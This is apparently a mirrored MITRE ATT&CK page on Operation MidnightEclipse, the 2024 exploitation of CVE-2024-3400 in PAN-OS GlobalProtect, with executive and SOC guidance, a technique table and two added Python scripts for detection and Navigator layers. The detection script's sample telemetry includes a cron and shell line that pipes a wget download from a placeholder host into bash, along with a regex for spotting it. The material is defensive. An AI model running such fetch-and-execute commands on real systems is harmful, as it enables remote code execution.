C0048: Operation MidnightEclipse
Operation MidnightEclipse was a campaign conducted in March and April 2024 that involved initial exploitation of the zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.[1][2]
Analyst context for executives and security teams
Operation MidnightEclipse matters because it shows how a critical zero-day in an internet-facing security appliance can become the entry point for broader enterprise activity. For leaders, the key issue is not only whether CVE-2024-3400 was patched, but whether the organization can prove that exposure assessment, compromise assessment, credential review, lateral-movement checks, and post-exploitation monitoring were completed.
Executive priority
Prioritize this as an edge-device and incident-readiness case. The campaign is tied to exploitation of CVE-2024-3400 in Palo Alto Networks PAN-OS GlobalProtect and to follow-on behaviors involving a backdoor, command execution, tool transfer, credential access, data collection, staging, command-and-control, and lateral movement techniques. Executives should ask for evidence of affected-asset inventory, patch/remediation status, firewall log retention, identity impact review, domain controller monitoring, and incident response decisions made after exposure was identified.
Technical view
ATT&CK does not provide campaign-specific detection guidance, so defenders should validate coverage against the related behaviors. Confirm whether exposed GlobalProtect/PAN-OS assets were inventoried and reviewed for signs associated with CVE-2024-3400 and UPSTYLE. For SOC and IR teams, the practical pivot is from edge compromise to enterprise impact: Unix shell execution, cron persistence, web-protocol C2, proxy use, ingress tool transfer, local data collection/staging, valid account abuse, SMB/WinRM lateral movement, and NTDS access attempts. Because the campaign object itself has no specified platforms or tactics, platform assumptions should be driven by the related software and techniques plus local asset evidence.
Likely telemetry
- Internet-facing firewall and GlobalProtect/PAN-OS logs, including management, system, authentication, and traffic records where available
- Network device file integrity, process, shell, and scheduled task/cron evidence where collected
- HTTP/HTTPS egress logs, proxy logs, DNS records, and firewall traffic metadata for unusual command-and-control patterns
- File creation, modification, and transfer evidence on affected network devices and adjacent Linux systems
- Identity provider, VPN, and privileged account authentication logs for valid-account misuse
Detection direction
- Start with exposure validation: identify PAN-OS GlobalProtect assets potentially affected by CVE-2024-3400 during the March-April 2024 campaign window described by ATT&CK and the cited reports.
- Tune detections for the relationship-driven chain rather than a single indicator: edge exploitation, UPSTYLE-related backdoor activity, Unix shell execution, cron changes, ingress tool transfer, proxy or web-protocol C2, and local staging.
- Correlate edge-device events with identity activity. Valid accounts and domain accounts are related techniques, so unexpected VPN, privileged, service, or domain account use after edge-device anomalies should be investigated.
- Validate Windows lateral movement coverage for SMB admin shares and WinRM, especially where authentication appears legitimate but source systems, timing, or account context are abnormal.
- Review domain controller monitoring for NTDS access attempts and access to backups containing domain credential material.
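The detection direction above is a chain rather than a single indicator: a cron entry or shell command that fetches over HTTP and pipes into bash, files appearing under the device's web application folder, and privileged account use shortly afterwards. The script below is an added example (not code from the page, from MITRE, Volexity or Unit 42) that runs that correlation over constructed telemetry. The log line formats, hostnames, account names, the web folder path and the TEST-NET IP addresses are all assumptions chosen for the example and are not campaign indicators.

```python
"""Added example: correlate edge-device evidence with follow-on identity activity
for the cron -> wget over HTTP -> pipe to bash -> web-folder staging -> privileged
account use chain. All telemetry here is constructed; formats, hosts, accounts,
paths and IPs are assumptions, not indicators from the campaign reports."""
import re
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"

# Constructed edge-device lines (assumed format: "<UTC ts> <host> <source> <text>").
EDGE_LINES = [
    "2024-04-09T11:00:00Z fw-edge-01 cron /etc/crontab: 0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf",
    "2024-04-10T02:14:07Z fw-edge-01 cron /etc/crontab: * * * * * root wget -qO- http://203.0.113.5/p | bash",
    "2024-04-10T02:15:02Z fw-edge-01 shell /bin/bash -c 'wget -qO- http://203.0.113.5/p | bash'",
    "2024-04-10T02:16:40Z fw-edge-01 file created /var/appweb/htdocs/out.txt",
    "2024-04-10T02:16:50Z fw-edge-01 file created /var/appweb/htdocs/dump.bin",
]

# Constructed authentication lines (assumed key=value format).
AUTH_LINES = [
    "2024-04-09T09:05:00Z dc-01 auth user=CORP\\jdoe src=10.0.8.14 proto=kerberos result=success",
    "2024-04-10T03:30:12Z dc-01 auth user=CORP\\da-admin src=10.0.5.23 proto=winrm result=success",
    "2024-04-10T03:41:55Z fs-02 auth user=CORP\\da-admin src=10.0.5.23 proto=smb result=success",
    "2024-04-12T08:00:00Z dc-01 auth user=CORP\\da-admin src=10.0.1.9 proto=kerberos result=success",
]

PRIVILEGED = {"da-admin"}        # assumed list of tier-0 / domain admin accounts
WEB_ROOT = "/var/appweb/htdocs"  # assumed web application folder on the device
# wget/curl fetching an http(s) URL whose output is piped into sh or bash
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl)\b[^|]*https?://\S+[^|]*\|\s*(?:ba)?sh\b")


def parse_edge(line):
    ts, host, source, text = line.split(" ", 3)
    return {"ts": datetime.strptime(ts, TS_FMT), "host": host, "source": source, "text": text}


def parse_auth(line):
    ts, host, _, kv = line.split(" ", 3)
    fields = dict(item.split("=", 1) for item in kv.split())
    fields["ts"] = datetime.strptime(ts, TS_FMT)
    fields["host"] = host
    fields["account"] = fields["user"].split("\\")[-1]  # drop the DOMAIN\ prefix
    return fields


def download_and_execute(events):
    """Cron or shell evidence that fetches over HTTP and pipes into a shell
    (T1053.003, T1071.001, T1105, T1059.004)."""
    return [e for e in events if e["source"] in ("cron", "shell") and DOWNLOAD_EXEC.search(e["text"])]


def web_folder_staging(events, web_root=WEB_ROOT):
    """Files created under the web application folder (T1074.001)."""
    hits = []
    for e in events:
        if e["source"] == "file" and e["text"].startswith("created "):
            path = e["text"].split(" ", 1)[1]
            if path.startswith(web_root + "/"):
                hits.append(e)
    return hits


def privileged_use_after(edge_hits, auth_events, window=timedelta(hours=24), privileged=PRIVILEGED):
    """Successful privileged logons within `window` after the first edge hit
    (T1078.002 followed by T1021.002 / T1021.006)."""
    if not edge_hits:
        return []
    start = min(e["ts"] for e in edge_hits)
    return [a for a in auth_events
            if a["account"] in privileged and a["result"] == "success"
            and start <= a["ts"] <= start + window]


def analyze(edge_lines, auth_lines):
    edge = [parse_edge(l) for l in edge_lines]
    auth = [parse_auth(l) for l in auth_lines]
    dl = download_and_execute(edge)
    staging = web_folder_staging(edge)
    ident = privileged_use_after(dl + staging, auth)
    return {
        "download_exec": [(e["ts"].strftime(TS_FMT), e["source"]) for e in dl],
        "staging_files": [e["text"].split(" ", 1)[1] for e in staging],
        "identity_followon": [(a["ts"].strftime(TS_FMT), a["host"], a["account"], a["proto"]) for a in ident],
        # Escalate to IR only when the edge chain and identity activity both appear.
        "escalate": bool(dl) and bool(ident),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(EDGE_LINES, AUTH_LINES), indent=2))
```

On the constructed input the logrotate cron entry is ignored, the wget-to-bash cron and shell lines are flagged, both files under the web folder are reported as staging, and the two domain admin logons over WinRM and SMB within 24 hours of the first edge hit are attached to the finding; the logon two days later falls outside the window. The window, the privileged account list and the web folder path are the parameters a team would tune to its own environment.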
Mitigation priorities
- Confirm asset inventory and remediation status for Palo Alto Networks PAN-OS GlobalProtect systems relevant to CVE-2024-3400.
- Preserve and review logs from affected or potentially affected edge devices before retention windows expire.
- Treat confirmed or suspected edge compromise as an identity-risk event: review privileged, VPN, service, and domain account activity and rotate credentials where incident findings justify it.
- Restrict and monitor administrative paths from edge devices into internal networks, including access that could enable SMB, WinRM, or domain controller interaction.
- Harden monitoring for Unix shell execution, cron persistence, file transfer, and outbound web/proxy traffic on network devices and supporting Linux systems where telemetry is available.
Analyst notes and limits
The decision value of this object is the campaign chain: public-facing appliance exploitation followed by backdoor deployment, execution, persistence, C2, collection, credential access, and lateral movement. For managed detection and IR, the most important validation is whether telemetry exists at the edge and whether investigations connected appliance events to identity and Windows domain activity.
ATT&CK provides no official detection text for this campaign, and the campaign object itself lists no platforms or tactics. Platform and behavior guidance here is derived from the official description, external references, and supplied relationships only. Local exposure, compromise, and control effectiveness require environment-specific evidence.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1005 | Data from Local System | During Operation MidnightEclipse, threat actors stole saved cookies and login data from targeted systems. [1] |
| Enterprise | T1078.002 | Valid Accounts: Domain Accounts | During Operation MidnightEclipse, threat actors used a compromised domain admin account to move laterally. [1] |
| Enterprise | T1003.003 | OS Credential Dumping: NTDS | During Operation MidnightEclipse, threat actors obtained Active Directory credentials via the NTDS.DIT file. [1] |
| Enterprise | T1059.004 | Command and Scripting Interpreter: Unix Shell | During Operation MidnightEclipse, threat actors piped output from stdout to bash for execution. [1][2] |
| Enterprise | T1090 | Proxy | During Operation MidnightEclipse, threat actors used the GO Simple Tunnel reverse proxy tool. [1] |
| Enterprise | T1559 | Inter-Process Communication | During Operation MidnightEclipse, threat actors wrote output to stdout then piped it to bash for execution. [1] |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads. [1][2] |
| Enterprise | T1078 | Valid Accounts | During Operation MidnightEclipse, threat actors extracted sensitive credentials while moving laterally through compromised networks. [1] |
| Enterprise | T1190 | Exploit Public-Facing Application | During Operation MidnightEclipse, threat actors exploited CVE-2024-3400 in Palo Alto Networks GlobalProtect. [1][2] |
| Enterprise | T1584.003 | Compromise Infrastructure: Virtual Private Server | During Operation MidnightEclipse, threat actors abused Virtual Private Servers to store malicious files. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | During Operation MidnightEclipse, threat actors downloaded additional payloads on compromised devices. [1][2] |
| Enterprise | T1588.002 | Obtain Capabilities: Tool | During Operation MidnightEclipse, threat actors used the GO Simple Tunnel (GOST) reverse proxy tool. [1] |
| Enterprise | T1053.003 | Scheduled Task/Job: Cron | During Operation MidnightEclipse, threat actors configured cron jobs to retrieve payloads from actor-controlled infrastructure. [1][2] |
| Enterprise | T1021.002 | Remote Services: SMB/Windows Admin Shares | During Operation MidnightEclipse, threat actors used SMB to pivot internally in victim networks. [1] |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | During Operation MidnightEclipse, threat actors copied files to the web application folder on compromised devices for exfiltration. [2] |
| Enterprise | T1021.006 | Remote Services: Windows Remote Management | During Operation MidnightEclipse, threat actors used WinRM to move laterally in targeted networks. [1] |
| Enterprise | T1584.006 | Compromise Infrastructure: Web Services | During Operation MidnightEclipse, threat actors abused compromised AWS buckets to store files. [1] |
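A common next step with a relationship table like this one is to turn it into an ATT&CK Navigator layer so coverage can be reviewed technique by technique. The script below is an added example (not code from the page or from MITRE) that parses a subset of rows from the table above, with names and citation markers normalized to the `[n]` form, and emits a layer. The layer `versions` values are assumptions and should be set to match the Navigator instance in use; parent techniques are added with `showSubtechniques` so each listed sub-technique is visible.

```python
"""Added example: parse rows from the page's "Techniques used" table into an
ATT&CK Navigator layer. Rows are a subset copied from the table above with
citation markers normalized to [n]; the version fields are assumptions."""
import json
import re

TABLE_ROWS = """
| Enterprise | T1190 | Exploit Public-Facing Application | During Operation MidnightEclipse, threat actors exploited CVE-2024-3400 in Palo Alto Networks GlobalProtect. [1][2] |
| Enterprise | T1053.003 | Scheduled Task/Job: Cron | During Operation MidnightEclipse, threat actors configured cron jobs to retrieve payloads from actor-controlled infrastructure. [1][2] |
| Enterprise | T1059.004 | Command and Scripting Interpreter: Unix Shell | During Operation MidnightEclipse, threat actors piped output from stdout to bash for execution. [1][2] |
| Enterprise | T1078.002 | Valid Accounts: Domain Accounts | During Operation MidnightEclipse, threat actors used a compromised domain admin account to move laterally. [1] |
| Enterprise | T1021.006 | Remote Services: Windows Remote Management | During Operation MidnightEclipse, threat actors used WinRM to move laterally in targeted networks. [1] |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | During Operation MidnightEclipse, threat actors copied files to the web application folder on compromised devices for exfiltration. [2] |
"""

# One markdown table row: | domain | Txxxx[.yyy] | name | procedure text |
ROW = re.compile(
    r"^\|\s*(?P<domain>[^|]+?)\s*\|\s*(?P<id>T\d{4}(?:\.\d{3})?)\s*\|\s*(?P<name>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|$"
)
CITE = re.compile(r"\[(\d+)\]")


def parse_rows(text):
    """Return one record per technique row; header and separator lines are skipped."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        proc = m.group("proc")
        rows.append({
            "domain": m.group("domain"),
            "id": m.group("id"),
            "name": m.group("name"),
            "procedure": CITE.sub("", proc).strip(),
            "citations": [int(c) for c in CITE.findall(proc)],
        })
    return rows


def navigator_layer(rows, name="C0048 Operation MidnightEclipse"):
    """Build a Navigator layer dict: each listed technique scored 1 with the
    procedure text as its comment; parents of sub-techniques are expanded."""
    techniques = {}
    for r in rows:
        refs = ", ".join(str(c) for c in r["citations"])
        techniques[r["id"]] = {
            "techniqueID": r["id"],
            "score": 1,
            "comment": f'{r["procedure"]} (refs {refs})',
        }
        if "." in r["id"]:
            parent = r["id"].split(".")[0]
            techniques.setdefault(parent, {"techniqueID": parent, "showSubtechniques": True})
    return {
        "name": name,
        "domain": "enterprise-attack",
        # Assumed values; align with the Navigator/ATT&CK release actually deployed.
        "versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
        "techniques": sorted(techniques.values(), key=lambda t: t["techniqueID"]),
    }


if __name__ == "__main__":
    print(json.dumps(navigator_layer(parse_rows(TABLE_ROWS)), indent=2))
```

The six rows produce eleven layer entries: the six listed techniques plus five parent entries (T1053, T1059, T1078, T1021, T1074) that carry no score and only expand their sub-techniques. Extending the input to the full table above changes nothing in the parser.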
Groups, software, and campaigns
S1164: UPSTYLE
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | cd9ffb98cd3b… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Volexity UPSTYLE 2024: Volexity Threat Research. (2024, April 12). Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400). Retrieved November 20, 2024.
[2] Palo Alto MidnightEclipse APR 2024: Unit 42. (2024, April 12). Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400. Retrieved January 15, 2025.
[3] mitre-attack C0048: MITRE ATT&CK. Operation MidnightEclipse (C0048).
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.